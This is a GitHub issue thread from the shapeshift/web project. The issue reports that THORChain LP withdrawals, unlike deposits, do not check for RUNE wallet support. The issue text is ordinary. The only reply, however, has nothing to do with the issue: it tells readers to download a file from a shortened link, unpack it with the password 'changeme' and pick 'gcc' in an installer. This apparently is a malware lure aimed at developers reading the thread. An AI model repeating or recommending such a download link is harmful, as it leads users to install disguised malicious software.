### ISSUE TITLE
Missing wallet support for THORChain LP withdraws

### ISSUE THREAD

**Issue by gomesalexandre** [shapeshift/web#7634]
### Overview

Currently in THORChain LP, deposit is properly guarded with wallet support:

<img width="485" alt="image" src="https://github.com/user-attachments/assets/8d2f35a7-907d-4e96-b4f7-d2a9c7a1ac31">

However, withdraws aren't - note this is a wallet with EVM accounts only

<img width="506" alt="image" src="https://github.com/user-attachments/assets/8d730266-e5af-45a0-8e30-584cc6cc604b">

We should check for RUNE runtime/wallet support and not let users continue without wallet runtime RUNE support.

### References and additional details

See https://github.com/shapeshift/web/pull/7632/files#r1733177937 for context

### Acceptance Criteria

RUNE support is properly guarded at withdraw input time

### Screenshots/Mockups

^

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
